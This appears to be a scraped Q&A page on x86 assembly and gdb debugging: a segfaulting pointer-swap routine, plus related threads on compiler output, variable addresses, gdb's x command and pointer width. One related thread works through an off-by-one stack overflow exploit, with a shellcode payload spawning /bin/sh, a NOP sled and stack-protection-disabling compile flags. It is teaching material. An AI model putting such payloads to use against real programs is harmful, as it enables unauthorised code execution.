passing character pointers to an external x86 32bit function - c

I am trying to write a small program that takes two hard coded character pointers and switches the contents that they point to using an external x86 32bit function located in a .S file. I am using the basic gcc compiler. Here is my C code:
valSwap.c:
#include <stdio.h>
void extern swapMe(char* c, char* d);
int main() {
char* c = "boi";
char* d = "bra";
printf("%s, %s", c, d);
swapMe(c, d);
printf("%s, %s", c, d);
return 0;
}
Before calling swapMe(c, d), the strings that c and d point to print as expected. After calling swapMe(c, d) I get a segmentation fault. Here is my code for the swapMe external function:
swapMe.S:
.intel_syntax noprefix
.text
.global swapMe
swapMe:
push edi
push esi
mov eax, [esp+4]
mov ecx, [esp+8]
mov edi, [eax]
mov esi, [ecx]
mov [eax], esi
mov [ecx], edi
pop esi
pop edi
ret
Now since swapMe(c, d) is taking in 2 parameters using the cdecl calling convention I should find c and d on the stack at $esp+4 and $esp+8. I tried to print these values to confirm that they are what I expect. Either they are not what I expected or I tried to print them incorrectly:
(gdb) p/s $esp+4
$1 = (void *) 0xffffdb08
(gdb) x/s $esp+4
0xffffdb08: ""
(gdb) p/s *($esp+4)
Attempt to dereference a generic pointer.
(gdb) x/s *($esp+4)
Attempt to dereference a generic pointer.
I also tried printing $eax as a string since I moved the contents of $esp+4 into $eax.
(gdb) p/x $eax
$3 = 0xf7fa0000
(gdb) x/s $eax
0xf7fa0000: "\260=\033"
(gdb) x/s *$eax
0x1b3db0: <error: Cannot access memory at address 0x1b3db0>
(gdb) x/x $eax
0xf7fa0000: 0xb0
I also printed the hex values of c and d before entering swapMe to see if I'm at least getting the correct value:
(gdb) p &c
$12 = (char **) 0xffffdb2c
(gdb) p c
$16 = 0x565556c0 "boi"
(gdb) p &d
$14 = (char **) 0xffffdb28
(gdb) p d
$15 = 0x565556c4 "bra"
I printed a few other values that may be relevant as well:
 0x56555621 <swapMe+2>  mov eax,DWORD PTR [esp+0x4]
 0x56555625 <swapMe+6>  mov ecx,DWORD PTR [esp+0x8]
>0x56555629 <swapMe+10> mov edi,DWORD PTR [eax]
 0x5655562b <swapMe+12> mov esi,DWORD PTR [ecx]
(gdb) p/x $eax
$8 = 0xf7fa0000
 0x56555621 <swapMe+2>  mov eax,DWORD PTR [esp+0x4]
 0x56555625 <swapMe+6>  mov ecx,DWORD PTR [esp+0x8]
 0x56555629 <swapMe+10> mov edi,DWORD PTR [eax]
>0x5655562b <swapMe+12> mov esi,DWORD PTR [ecx]
 0x5655562d <swapMe+14> mov DWORD PTR [eax],esi
 0x5655562f <swapMe+16> mov DWORD PTR [ecx],edi
(gdb) p/x $edi
$11 = 0x1b3db0
 0x56555621 <swapMe+2>  mov eax,DWORD PTR [esp+0x4]
 0x56555625 <swapMe+6>  mov ecx,DWORD PTR [esp+0x8]
 0x56555629 <swapMe+10> mov edi,DWORD PTR [eax]
 0x5655562b <swapMe+12> mov esi,DWORD PTR [ecx]
>0x5655562d <swapMe+14> mov DWORD PTR [eax],esi
 0x5655562f <swapMe+16> mov DWORD PTR [ecx],edi
(gdb) p/x $ecx
$19 = 0x565555f5
(gdb) p/x $esi
$20 = 0x8310c483
I don't understand why I'm getting different values when I print the values of $eax, $edi, $ecx, and $esp in swapMe vs when I print the values associated with c and d before calling swapMe. Since swapMe takes in c and d as parameters, I expected to see the same values on the stack when calling swapMe but I do not. I did not see 0xffffdb2c or 0x565556c0 once when printing any registers. Please clarify what I did wrong when calling the function, passing in the parameters, or printing the values in the registers. I'm very new to x86 so I probably made a rookie mistake somewhere.

Related

Why does this generated assembly code seem to contain nonsense? [duplicate]

This question already has an answer here:
Why does clang produce inefficient asm with -O0 (for this simple floating point sum)?
Closed 3 years ago.
I used https://godbolt.org/ with "x86-64 gcc 9.1" to compile the following C code to assembly, to understand why passing a pointer to a local variable as a function argument works. Now I have difficulty understanding some steps.
I commented on the lines I have difficulty with.
#include <stdio.h>
void printStr(char* cpStr) {
printf("str: %s", cpStr);
}
int main(void) {
char str[] = "abc";
printStr(str);
return 0;
}
.LC0:
.string "str: %s"
printStr:
push rbp
mov rbp, rsp
sub rsp, 16 ; why allocate 16 bytes when using it just for the pointer to str[0] which is 4 bytes long?
mov QWORD PTR [rbp-8], rdi ; why copy rdi to the stack...
mov rax, QWORD PTR [rbp-8] ; ... just to copy it into rax again? Also rax seems to already contain the pointer to str[0] (see *)
mov rsi, rax
mov edi, OFFSET FLAT:.LC0
mov eax, 0
call printf
nop
leave
ret
main:
push rbp
mov rbp, rsp
sub rsp, 16 ; why allocate 16 bytes when "abc" is just 4 bytes long?
mov DWORD PTR [rbp-4], 6513249
lea rax, [rbp-4] ; pointer to str[0] copied into rax (*)
mov rdi, rax ; why copy the pointer to str[0] to rdi?
call printStr
mov eax, 0
leave
ret
Thanks to the help of Jester I could solve my confusion. The following code is compiled with the "-O1" flag of GCC (for me the best optimization level to understand what's going on):
.LC0:
.string "str: %s"
printStr:
sub rsp, 8
; now the call to printf gets prepared, rdi = first argument, rsi = second argument
mov rsi, rdi ; move the pointer to str[0] to rsi
mov edi, OFFSET FLAT:.LC0 ; move address of static string literal "str: %s" to edi
mov eax, 0 ; set eax to the number of vector registers used, because printf is a varargs function
call printf
add rsp, 8
ret
main:
sub rsp, 24
mov DWORD PTR [rsp+12], 6513249 ; create string "abc" on the stack
lea rdi, [rsp+12] ; move address of str[0] (pointer to 'a') to rdi (first argument for printStr)
call printStr
mov eax, 0
add rsp, 24
ret
As Jester said, the 16 bytes were allocated for alignment. There is a good post on Stack Overflow which explains this here.
Edit:
There is a post on Stack Overflow which explains why al is zeroed before a call to a varargs function here.

Using OllyDbg, can anyone tell me the address of the variable "a"?

My very simple test program:
#include<stdio.h>
#include<stdlib.h>
int main()
{
int a = 12345;
printf("%d\n", a);
system("PAUSE");
return 0;
}
After compiling and linking, the EXE file is created. Then I open the EXE file in OllyDbg:
The picture shows the main() function, but I can't find the address of the variable a. When passing the parameters to printf(), it pushes 3039 onto the stack. Does that mean the value of the variable a is 3039? No, the value is 12345. So does it mean the address of the variable a is 00003039? Can anyone explain?
The address of the variable a is [ebp-8]. You are seeing the 0x3039 assignment because decimal 12345 is hexadecimal 0x3039. If you change your code to use a hex value, int a = 0x12345, the results will be clearer.
Numeric constants are usually compiled directly into the code.
So you want to know the address of the variable a. That's extremely simple: insert this statement into your program:
printf( "address of variable 'a' is: %p\n", (void *)&a );
How are we to know the address? We are not sitting at your computer, and it will be different on almost every computer, so use the suggested call to printf() to learn the 'address'.
However, due to paging, address translation, virtual addressing, etc., that address is NOT the actual physical address within your computer's memory space.
Local variables such as a in this case are stored on the stack, so they can be discarded when the function finishes executing. a is simply located at an address within main's stack frame.
int a = 12345; // MOV DWORD PTR SS:[EBP-8], 3039
printf("%d\n", a);
In this case, a is located at [EBP-8]. If you inspect where it points, you can see the value 3039 stored there (after the assignment, of course). 3039 is a hex number, which is 12345 in base 10.
To get better understanding of this, let's modify the program a little bit and debug it in GDB.
C:\Codes>gdb test -q
Reading symbols from C:\Codes\test.exe...done.
(gdb) set disassembly-flavor intel
(gdb) list
1 #include<stdio.h>
2
3 int main()
4 {
5 int a = 12345;
6 int b = 0x12345;
7 printf("Variable a %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", a,a,&a,&a);
8 printf("Variable b %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", b,b,&b,&b);
9 return 0;
10 }
(gdb)
Standard Output
C:\Codes>test
Variable a 12345 (decimal) or 0x3039 (hex), located at 0022FF4C or 0x22ff4c
Variable b 74565 (decimal) or 0x12345 (hex), located at 0022FF48 or 0x22ff48
As you can see, the virtual memory addresses of variables a and b are 0x22ff4c and 0x22ff48 respectively.
Let's take a look at this program in GDB.
(gdb) break 7
Breakpoint 1 at 0x40135e: file test.c, line 7.
(gdb) run
Starting program: C:\Codes/test.exe
[New Thread 3680.0xed8]
Breakpoint 1, main () at test.c:7
7 printf("Variable a %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", a,a,&a,&a);
(gdb) disassemble
Dump of assembler code for function main:
0x00401340 <+0>: push ebp
0x00401341 <+1>: mov ebp,esp
0x00401343 <+3>: and esp,0xfffffff0
0x00401346 <+6>: sub esp,0x30
0x00401349 <+9>: call 0x401970 <__main>
0x0040134e <+14>: mov DWORD PTR [esp+0x2c],0x3039
0x00401356 <+22>: mov DWORD PTR [esp+0x28],0x12345
=> 0x0040135e <+30>: mov edx,DWORD PTR [esp+0x2c]
0x00401362 <+34>: mov eax,DWORD PTR [esp+0x2c]
0x00401366 <+38>: lea ecx,[esp+0x2c]
0x0040136a <+42>: mov DWORD PTR [esp+0x10],ecx
0x0040136e <+46>: lea ecx,[esp+0x2c]
0x00401372 <+50>: mov DWORD PTR [esp+0xc],ecx
0x00401376 <+54>: mov DWORD PTR [esp+0x8],edx
0x0040137a <+58>: mov DWORD PTR [esp+0x4],eax
0x0040137e <+62>: mov DWORD PTR [esp],0x403024
0x00401385 <+69>: call 0x401be0 <printf>
0x0040138a <+74>: mov edx,DWORD PTR [esp+0x28]
0x0040138e <+78>: mov eax,DWORD PTR [esp+0x28]
0x00401392 <+82>: lea ecx,[esp+0x28]
0x00401396 <+86>: mov DWORD PTR [esp+0x10],ecx
0x0040139a <+90>: lea ecx,[esp+0x28]
0x0040139e <+94>: mov DWORD PTR [esp+0xc],ecx
0x004013a2 <+98>: mov DWORD PTR [esp+0x8],edx
0x004013a6 <+102>: mov DWORD PTR [esp+0x4],eax
0x004013aa <+106>: mov DWORD PTR [esp],0x403064
0x004013b1 <+113>: call 0x401be0 <printf>
0x004013b6 <+118>: mov eax,0x0
0x004013bb <+123>: leave
0x004013bc <+124>: ret
End of assembler dump.
(gdb)
Now focus on these lines:
0x0040134e <+14>: mov DWORD PTR [esp+0x2c],0x3039
0x00401356 <+22>: mov DWORD PTR [esp+0x28],0x12345
As you can see from the previous output, variables a and b are located at [esp+0x2c] (0x22ff4c) and [esp+0x28] (0x22ff48) respectively, while 0x3039 and 0x12345 are the values of a and b in hexadecimal.
To verify the memory address of these variables in GDB, use print command as follows:
(gdb) print &a
$1 = (int *) 0x22ff4c
(gdb) print &b
$2 = (int *) 0x22ff48
Also, you might wonder where the addresses 0x22ff4c and 0x22ff48 come from.
To understand this, let's check the current value of the ESP register:
(gdb) info registers esp
esp 0x22ff20 0x22ff20
Then substitute the actual ESP value:
[esp+0x2c] = [0x22ff20 + 0x2c] = 0x22ff4c
[esp+0x28] = [0x22ff20 + 0x28] = 0x22ff48

Offbyone buffer overflow NULL byte in payload

I was trying an off-by-one buffer overflow with the help of the following simple code:
#include <string.h>
void cpy(char *x){
char buf[128]="";
strncat(buf,x,sizeof(buf));
}
int main(int argc, char **argv)
{
cpy(argv[1]);
}
This diagram shows how an off-by-one buffer overflow works:
Taken from : https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
Here is the Disassembly of main and cpy
Here is the payload that I used
Memory dumps
So, using the buffer in cpy's stack frame, I change the least significant byte of the saved RBP to 00 (because of the off-by-one overflow, achieved by providing exactly 128 bytes of input).
As you can see, the address 0x7fffffffe177 holds the saved RBP, whose value changes from 0x7fffffffe190 to 0x7fffffffe100.
So I arranged for my payload to start at address 0x7fffffffe10F, which is also the return address of main.
That return address is supposed to be 0xffffe110 0x00007fff instead of 0xffffe110 0x90907fff, but since the payload must not contain 00 bytes, I cannot write it: a 64-bit address is 8 bytes long, and 0xffffe110 0x00007fff contains zero bytes.
So how exactly should I set the return address here?
Also, in the memory dump image at breakpoint 1, which is inside cpy's stack frame, why are argc and argv[] at the top of the stack?
I am new to exploit writing, and any help will be much appreciated.
So let's start with a description of the trick that can be used to set the desired return address value without passing zero bytes in payload.
I've changed your code a little bit to make it easier to do the trick. Here is new code:
#include <string.h>
int i;
void cpy(char *x) {
char buf[128];
for (i = 0; i <= 128; ++i) {
buf[i] = x[i];
}
}
int main(int argc, char **argv) {
cpy(argv[1]);
return 0;
}
The main difference is that now we can control the value of the least significant byte of the saved rbp. In your example we can only set it to zero.
So here is the stack frame of our cpy function:
#rbp - saved base stack pointer of main function
#rsp - stack pointer at the start of cpy function (right after push rbp)
The trick is to overwrite the last byte so that the forged #rbp = #rsp - 8. After cpy returns, main's rbp equals #rsp - 8. When main then executes leave, rsp becomes #rsp - 8, pop rbp consumes that slot, and ret reads the return address from #rsp itself: the slot where the saved rbp was stored, which now holds #rsp - 8!
So after returning from main we jump to #rsp - 8, and we simply put a jmp to the shellcode at this address and we are done.
But in your original example this trick can't be done, because we can't control the value of the least significant byte of #rbp.
It should also be noted that this trick will not work if #rbp and #rsp differ in more than the last byte.
And finally, here is the exploit.
Compile code with executable stack and without stack protection:
$ gcc test.c -o test -z execstack -fno-stack-protector
Get byte code for our jmp to shellcode:
$ rasm2 -a x86 -b 64 'jmp -0x50'
ebae
Exploit under gdb:
$ gdb --args test $(python -c 'print "\x90" * 91 + "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" + "\xeb\xb8" + "a" * 6 + "\xc8"')
>>> b cpy
>>> b *cpy+90
>>> r
Breakpoint 1, 0x00000000004004aa in cpy ()
So here is the saved rbp:
>>> x/1gx $rbp
0x7fffffffd3d0: 0x00007fffffffd3f0
Here is rsp at the start of cpy function:
>>> p/x $rsp
$1 = 0x7fffffffd3d0
The value of rbp we want to get after returning from cpy (that's why the last byte of the payload is \xc8):
>>> p/x $rsp - 8
$2 = 0x7fffffffd3c8
Continue to the end of cpy:
>>> c
Breakpoint 2, 0x0000000000400500 in cpy ()
Asm code of cpy:
>>> disassemble cpy
Dump of assembler code for function cpy:
0x00000000004004a6 <+0>: push rbp
0x00000000004004a7 <+1>: mov rbp,rsp
0x00000000004004aa <+4>: sub rsp,0x10
0x00000000004004ae <+8>: mov QWORD PTR [rbp-0x88],rdi
0x00000000004004b5 <+15>: mov DWORD PTR [rip+0x20046d],0x0 # 0x60092c <i>
0x00000000004004bf <+25>: jmp 0x4004f2 <cpy+76>
0x00000000004004c1 <+27>: mov eax,DWORD PTR [rip+0x200465] # 0x60092c <i>
0x00000000004004c7 <+33>: mov edx,DWORD PTR [rip+0x20045f] # 0x60092c <i>
0x00000000004004cd <+39>: movsxd rcx,edx
0x00000000004004d0 <+42>: mov rdx,QWORD PTR [rbp-0x88]
0x00000000004004d7 <+49>: add rdx,rcx
0x00000000004004da <+52>: movzx edx,BYTE PTR [rdx]
0x00000000004004dd <+55>: cdqe
0x00000000004004df <+57>: mov BYTE PTR [rbp+rax*1-0x80],dl
0x00000000004004e3 <+61>: mov eax,DWORD PTR [rip+0x200443] # 0x60092c <i>
0x00000000004004e9 <+67>: add eax,0x1
0x00000000004004ec <+70>: mov DWORD PTR [rip+0x20043a],eax # 0x60092c <i>
0x00000000004004f2 <+76>: mov eax,DWORD PTR [rip+0x200434] # 0x60092c <i>
0x00000000004004f8 <+82>: cmp eax,0x80
0x00000000004004fd <+87>: jle 0x4004c1 <cpy+27>
0x00000000004004ff <+89>: nop
=> 0x0000000000400500 <+90>: leave
0x0000000000400501 <+91>: ret
End of assembler dump.
Value of rbp after leave:
>>> ni
>>> p/x $rbp
$1 = 0x7fffffffd3c8
Execute till the end of main:
>>> ni
>>> ni
>>> ni
>>> disassemble
Dump of assembler code for function main:
0x0000000000400502 <+0>: push rbp
0x0000000000400503 <+1>: mov rbp,rsp
0x0000000000400506 <+4>: sub rsp,0x10
0x000000000040050a <+8>: mov DWORD PTR [rbp-0x4],edi
0x000000000040050d <+11>: mov QWORD PTR [rbp-0x10],rsi
0x0000000000400511 <+15>: mov rax,QWORD PTR [rbp-0x10]
0x0000000000400515 <+19>: add rax,0x8
0x0000000000400519 <+23>: mov rax,QWORD PTR [rax]
0x000000000040051c <+26>: mov rdi,rax
0x000000000040051f <+29>: call 0x4004a6 <cpy>
0x0000000000400524 <+34>: mov eax,0x0
0x0000000000400529 <+39>: leave
=> 0x000000000040052a <+40>: ret
End of assembler dump.
>>> ni
Now we are at #rsp - 8, and here is our jmp to the shellcode:
>>> disassemble $rip,+2
Dump of assembler code from 0x7fffffffd3c8 to 0x7fffffffd3ca:
=> 0x00007fffffffd3c8: jmp 0x7fffffffd382
End of assembler dump.
And finally shellcode:
>>> ni
>>> disassemble $rip,+0x50
Dump of assembler code from 0x7fffffffd382 to 0x7fffffffd3d2:
=> 0x00007fffffffd382: nop
0x00007fffffffd383: nop
0x00007fffffffd384: nop
0x00007fffffffd385: nop
...
0x00007fffffffd3ab: xor rdi,rdi
0x00007fffffffd3ae: push rdi
0x00007fffffffd3af: push rdi
0x00007fffffffd3b0: pop rsi
0x00007fffffffd3b1: pop rdx
0x00007fffffffd3b2: movabs rdi,0x68732f6e69622f2f
0x00007fffffffd3bc: shr rdi,0x8
0x00007fffffffd3c0: push rdi
0x00007fffffffd3c1: push rsp
0x00007fffffffd3c2: pop rdi
0x00007fffffffd3c3: push 0x3b
0x00007fffffffd3c5: pop rax
0x00007fffffffd3c6: syscall

What does gdb 'x' command do?

I am reading a book about hacking and it has a chapter about assembly.
Following is my tiny program written in C.
#include <stdio.h>
int main(int argc, char const *argv[])
{
int i;
for (i = 0; i < 10; i++) {
puts("Hello World!");
}
return 0;
}
And the following is my gdb session:
(gdb) break main
Breakpoint 1 at 0x40050f: file main.c, line 7.
(gdb) run
Breakpoint 1, main (argc=1, argv=0x7fffffffe708) at main.c:7
7 for (i = 0; i < 10; i++) {
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400500 <+0>: push rbp
0x0000000000400501 <+1>: mov rbp,rsp
0x0000000000400504 <+4>: sub rsp,0x20
0x0000000000400508 <+8>: mov DWORD PTR [rbp-0x14],edi
0x000000000040050b <+11>: mov QWORD PTR [rbp-0x20],rsi
=> 0x000000000040050f <+15>: mov DWORD PTR [rbp-0x4],0x0
0x0000000000400516 <+22>: jmp 0x400526 <main+38>
0x0000000000400518 <+24>: mov edi,0x4005c4
0x000000000040051d <+29>: call 0x4003e0 <puts@plt>
0x0000000000400522 <+34>: add DWORD PTR [rbp-0x4],0x1
0x0000000000400526 <+38>: cmp DWORD PTR [rbp-0x4],0x9
0x000000000040052a <+42>: jle 0x400518 <main+24>
0x000000000040052c <+44>: mov eax,0x0
0x0000000000400531 <+49>: leave
0x0000000000400532 <+50>: ret
End of assembler dump.
The following part is what I don't understand. Please note that $rip is the "instruction pointer" and points to 0x000000000040050f <+15>.
(gdb) x/x $rip
0x40050f <main+15>: 0x00fc45c7
(gdb) x/12x $rip
0x40050f <main+15>: 0x00fc45c7 0xeb000000 0x05c4bf0e 0xbee80040
0x40051f <main+31>: 0x83fffffe 0x8301fc45 0x7e09fc7d 0x0000b8ec
0x40052f <main+47>: 0xc3c90000 0x1f0f2e66 0x00000084 0x1f0f0000
(gdb) x/8xb $rip
0x40050f <main+15>: 0xc7 0x45 0xfc 0x00 0x00 0x00 0x00 0xeb
(gdb) x/8xh $rip
0x40050f <main+15>: 0x45c7 0x00fc 0x0000 0xeb00 0xbf0e 0x05c4 0x0040 0xbee8
(gdb) x/8xw $rip
0x40050f <main+15>: 0x00fc45c7 0xeb000000 0x05c4bf0e 0xbee80040
0x40051f <main+31>: 0x83fffffe 0x8301fc45 0x7e09fc7d 0x0000b8ec
The first command, x/x $rip, outputs 0x40050f <main+15>: 0x00fc45c7.
(1) Is it the instruction at 0x40050f? Is 0x00fc45c7 the same as mov DWORD PTR [rbp-0x4],0x0 (the assembled instruction at 0x40050f)?
(2) If it is the instruction, what are those hex numbers in the output of the commands x/12x $rip, x/8xw $rip, and x/8xh $rip?
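As to (1), partly: x/x $rip prints the 4 bytes starting at 0x40050f, so 0x00fc45c7 is the beginning of that instruction's encoding, not the whole instruction.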
As to (2), the x command has up to 3 specifiers: how many objects to print; in which format; and what object size. In all your examples you choose to print as hex (x). As to the first specifier, you ask to print 12, 8, 8 objects.
As to the last specifier in your cases:
x/12x has none, so gdb defaults to assuming you want 4-byte chunks (which GDB calls "words", x86 calls "double words"). Generally, I'd always specify what exactly you want as opposed to falling back on default settings.
x/8xw does the same, for 8 objects, as you explicitly requested dwords now.
(The x command defaults to the last size you used, but the initial default for that on startup is w words)
x/8xh requests half-word sized chunks of 2 bytes, so objects printed in 2 byte chunks. (Half-word relative to GDB's standard 32-bit word size; x86 calls this a "word").
In case you wonder why the concatenation of two neighboring values does not equal what was reported when you printed in dwords, this is because the x86 is a little-endian architecture. What that means is detailed quite well in Erickson's book again - if you look a few pages ahead, he does some calculations you might find helpful. In a nutshell, if you recombine them (2,1) (4,3), ..., you'll see they match.
(gdb) help x
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
t(binary), f(float), a(address), i(instruction), c(char) and s(string),
T(OSType), A(floating point values in hex).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
The specified number of objects of the specified size are printed
according to the format.
Defaults for format and size letters are those previously used.
Default count is 1. Default address is following last thing printed
with this command or "print".

Arrays pointers on 32bit and 64bit systems

The following code prints different results on 32bit and 64bit systems:
#include <stdio.h>
void swapArray(int **a, int **b)
{
int *temp = *a;
*a = *b;
*b = temp;
}
int main()
{
int a[2] = {1, 3};
int b[2] = {2, 4};
swapArray(&a, &b);
printf("%d\n", a[0]);
printf("%d\n", a[1]);
return 0;
}
After compiling it in 32bit system, the output is:
2
3
On 64bit the output is:
2
4
As I understand it, the function swapArray just swaps the pointers to the first elements of a and b. So after calling swapArray, a should point to 2 and b should point to 1.
For this reason a[0] should yield 2, and a[1] should reference the next int in memory after the location of 2, which contains 4.
Can anyone please explain?
Edit:
Thanks to the comments and answers, I now notice that &a and &b are of type int (*)[2] and not int **. This obviously makes the code incorrect (and indeed I get a compiler warning). It is intriguing, though, that the compiler (gcc) gives just a warning and not an error.
I am still left with the question what causes different results on different systems, but since the code is incorrect, it is less relevant.
Edit 2:
As for the different results on different systems, I suggest reading AndreyT's comment.
swapArray(&a, &b);
&a and &b are not of type int ** but of type int (*)[2]. BTW your compiler is kind enough to accept your program but a compiler has the right to refuse to translate it.
Before answering your question, let's see what happens under the hood during a pointer operation. I'm using very simple code to demonstrate this:
#include <stdio.h>
int main() {
int *p;
int **p2;
int x = 3;
p = &x;
p2 = &p;
return 0;
}
Now look at the disassembly :
(gdb) disassemble
Dump of assembler code for function main:
0x0000000000400474 <+0>: push rbp
0x0000000000400475 <+1>: mov rbp,rsp
0x0000000000400478 <+4>: mov DWORD PTR [rbp-0x14],0x3
0x000000000040047f <+11>: lea rax,[rbp-0x14]
0x0000000000400483 <+15>: mov QWORD PTR [rbp-0x10],rax
0x0000000000400487 <+19>: lea rax,[rbp-0x10]
0x000000000040048b <+23>: mov QWORD PTR [rbp-0x8],rax
=> 0x000000000040048f <+27>: mov eax,0x0
0x0000000000400494 <+32>: leave
0x0000000000400495 <+33>: ret
The disassembly is pretty self-evident, but a few notes need to be added here.
My function's stack frame starts here:
0x0000000000400474 <+0>: push rbp
0x0000000000400475 <+1>: mov rbp,rsp
So let's see what rbp holds now:
(gdb) info registers $rbp
rbp 0x7fffffffe110 0x7fffffffe110
Here we are storing the value 3 at address [rbp-0x14]. Let's look at the memory there:
(gdb) x/1xw $rbp - 0x14
0x7fffffffe0fc: 0x00000003
It's important to notice that the DWORD data type is used, which is 32 bits wide. So, as a side note, the int x (and the literal 3 stored into it) occupies a 4-byte unit.
Next instruction uses lea to load the effective address of the value just saved in earlier instruction.
0x000000000040047f <+11>: lea rax,[rbp-0x14]
It means that now $rax will have the value 0x7fffffffe0fc.
(gdb) p/x $rax
$4 = 0x7fffffffe0fc
Next we will save this address into memory using
0x0000000000400483 <+15>: mov QWORD PTR [rbp-0x10],rax
An important thing to note is that a QWORD is used here, because 64-bit systems have an 8-byte native pointer size, whereas the earlier mov instruction used 0x14 - 0x10 = 4 bytes.
Next we have :
0x0000000000400487 <+19>: lea rax,[rbp-0x10]
0x000000000040048b <+23>: mov QWORD PTR [rbp-0x8],rax
This is the same thing again, for the second level of indirection. On this system, all values that are addresses are QWORDs; this is an important thing to take note of.
Now lets come to your code.
Before calling swapArray you have:
=> 0x00000000004004fe <+8>: mov DWORD PTR [rbp-0x10],0x1
0x0000000000400505 <+15>: mov DWORD PTR [rbp-0xc],0x3
0x000000000040050c <+22>: mov DWORD PTR [rbp-0x20],0x2
0x0000000000400513 <+29>: mov DWORD PTR [rbp-0x1c],0x4
0x000000000040051a <+36>: lea rdx,[rbp-0x20]
0x000000000040051e <+40>: lea rax,[rbp-0x10]
0x0000000000400522 <+44>: mov rsi,rdx
0x0000000000400525 <+47>: mov rdi,rax
This is very simple: your arrays are initialized, and the effect of the & operator is visible when the effective addresses of the starts of the arrays are loaded into $rdi and $rsi.
Now let's see what it's doing inside swapArray().
The start addresses of your arrays are in $rdi and $rsi, so let's see their contents:
(gdb) p/x $rdi
$2 = 0x7fffffffe100
(gdb) p/x $rsi
$3 = 0x7fffffffe0f0
0x00000000004004c8 <+4>: mov QWORD PTR [rbp-0x18],rdi
0x00000000004004cc <+8>: mov QWORD PTR [rbp-0x20],rsi
Now the first statement int *temp = *a is performed by following instructions.
0x00000000004004d0 <+12>: mov rax,QWORD PTR [rbp-0x18]
0x00000000004004d4 <+16>: mov rax,QWORD PTR [rax]
0x00000000004004d7 <+19>: mov QWORD PTR [rbp-0x8],rax
Now comes the defining moment: what's happening with your *a?
It loads into $rax the value stored at [rbp-0x18], where $rdi was saved, which in turn holds the address of the first element of the first array.
It then performs another indirection, using the address stored in $rax to fetch a QWORD into $rax. So what does it return? A QWORD from 0x7fffffffe100, which in effect forms one 8-byte quantity from the two 4-byte quantities saved there. To elaborate:
The memory there looks like this:
(gdb) x/2xw $rdi
0x7fffffffe100: 0x00000001 0x00000003
Now if you fetch a QWORD
(gdb) x/1xg $rdi
0x7fffffffe100: 0x0000000300000001
So you are already in trouble, because you are fetching with the wrong width: two 4-byte ints are read as one 8-byte pointer.
The rest of the codes can be explained in similar manner.
Now why is it different on a 32-bit platform? Because on a 32-bit platform the native pointer width is 4 bytes, so each load and store in swapArray moves only one int there, which is why you see 2 and 3. The main problem with your semantically incorrect code comes from the difference between the width of int and the width of native pointers. If both are the same, your code may happen to work.
But you should never write code that assumes the sizes of native types. That's what standards are for, and that's why your compiler gives you a warning.
From the language point of view, it's a type mismatch, which was already pointed out in the earlier answers, so I'm not going into that.
You can't swap arrays using the pointer trick (they are not pointers!). You would either have to create pointers to those arrays and use the pointers or dynamically allocate the arrays using malloc etc.
The results I get on a 64-bit system are different from yours; for example, I get:
2
3
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
And with clang on my mac I get an error:
test.cpp: In function ‘int main()’:
test.cpp:13: error: cannot convert ‘int (*)[2]’ to ‘int**’ for argument ‘1’ to ‘void swapArray(int**, int**)’
I assume that this is undefined behavior and you are trying to interpret what is probably junk output.
